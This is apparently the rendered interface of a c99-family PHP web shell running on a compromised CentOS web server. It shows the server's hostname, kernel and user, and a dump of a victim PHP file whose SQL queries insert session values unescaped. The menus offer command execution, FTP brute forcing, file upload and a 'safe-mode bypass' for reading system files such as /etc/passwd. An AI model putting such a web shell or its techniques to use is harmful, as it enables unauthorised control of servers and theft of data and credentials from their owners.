!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/director/   drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     menu_thaimed_bkp.php (5.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start();

 if (session_is_registered("valid_user")&&session_is_registered("Priority")&&session_is_registered("password") )
 {
include("../include/FunctionDB.php");
include("admin_menu.php");
 ConnectDB();
$Username = $valid_user;
$sql = "SELECT * FROM personal_tb WHERE Username='$Username'";
$result = mysql_query($sql) ;
$rs = mysql_fetch_array($result);
$row = mysql_num_rows($result);
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<style type="text/css">
<!--
.style2 {color: #003399}
.style17 {font-size: 14px}
-->
</style>
<table width="796" border="0" cellpadding="0" cellspacing="0">
	<tr>
		<td width="796"><br><fieldset>
			<legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Director_menu.php" >หน้าหลัก</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_man.php"></a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" />รายงานประเภทต่างๆ</font></legend>
			<label><div align="center">
			  <form id="form1" name="form1" method="post" action="">
			    <div align="left"><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font>
		        </div>
			    <table width="57%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#FFFFFF" bgcolor="#FFFFFF" style="border:0px solid gray">
                  
                  <tr onmouseover="this.style.backgroundColor='#FCFCF3'" onmouseout="this.style.backgroundColor='#EEEEEE'" >
                    <td bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma"><strong><img src="../picture/ico1.gif" width="22" height="22" align="absmiddle" /></strong></font></div></td>
                    <td bgcolor="#FFFFFF"><font face="Tahoma"><a href="DentisBycode.php" class="style17">รายรับพนักงานนวด</a></font></td>
                    <td bgcolor="#FFFFFF"><div align="center"><font size="4" face="Tahoma">
                        <?php 
						  $code = $rs["Teacher_code"];
						   $sql10 = "Select * From edu_product_tb  Where Teacher_code='$code'";
						  $result10 = mysql_query($sql10) or die(" Error".mysql_error());
						  $r10 = mysql_num_rows($result10);
						   if ( $r10 == 0)
						      {
							  echo"<font face=\"Tahoma\" Size=\"2\" color=\"#FF0000\">";
							   echo"ยังไม่ข้อมูล";
							   echo"</font>";
						      }
							else if ($r10  > 0) 
							  {
							  echo"<font face=\"Tahoma\" Size=\"2\" color=\"#006633\">";
						       echo"$r10  <font face=\"Tahoma\" Size=\"2\" color=\"#000000\">ระเบียน</font>";
							   echo"</font>";
							  } 
						  ?>
                    </font></strong></div></td>
                  </tr>
                  <tr onmouseover="this.style.backgroundColor='#FCFCF3'" onmouseout="this.style.backgroundColor='#EEEEEE'" >
                    <td bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma"><strong><img src="../picture/ico1.gif" width="22" height="22" align="absmiddle" /></strong></font></div></td>
                    <td bgcolor="#FFFFFF" class="d style2"><font face="Tahoma"><a href="FrmpersonList.php" class="style17">ข้อมูลใบเสร็จรับเงิน</a></font></td>
                    <td bgcolor="#FFFFFF"><div align="center"></strong></div></td>
                  </tr>
                  <tr onmouseover="this.style.backgroundColor='#FCFCF3'" onmouseout="this.style.backgroundColor='#EEEEEE'" >
                    <td bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma"><strong><img src="../picture/ico1.gif" width="22" height="22" align="absmiddle" /></strong></font></div></td>
                    <td bgcolor="#FFFFFF"><font face="Tahoma"><a href="MedByday.php" class="style17">ข้อมูลรายรับจำแนกตามรายวัน</a></font></td>
                    <td bgcolor="#FFFFFF"><div align="center"></strong></div></td>
                  </tr>
                  <tr onmouseover="this.style.backgroundColor='#FCFCF3'" onmouseout="this.style.backgroundColor='#EEEEEE'" >
                    <td width="6%" bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma"><strong><img src="../picture/ico1.gif" width="22" height="22" align="absmiddle" /></strong></font></div></td>
                    <td width="81%" bgcolor="#FFFFFF">&nbsp;</td>
                    <td width="13%" bgcolor="#FFFFFF"><div align="center"></strong></div></td>
                  </tr>
                  <tr onmouseover="this.style.backgroundColor='#FCFCF3'" onmouseout="this.style.backgroundColor='#EEEEEE'" >
                    <td bgcolor="#FFFFFF"><font size="2" face="Tahoma"><strong><img src="../picture/ico1.gif" width="22" height="22" align="absmiddle" /></strong></font></td>
                    <td bgcolor="#FFFFFF" class="d style2">&nbsp;</td>
                    <td bgcolor="#FFFFFF"><div align="center"></div></td>
                  </tr>
                </table>
			    <br>
			</form>
			  </div>
			</label>
		</fieldset><br>
		<font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br>
		</font></td>
	</tr>
</table>
<?php 
	}
else
{
       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0046 ]--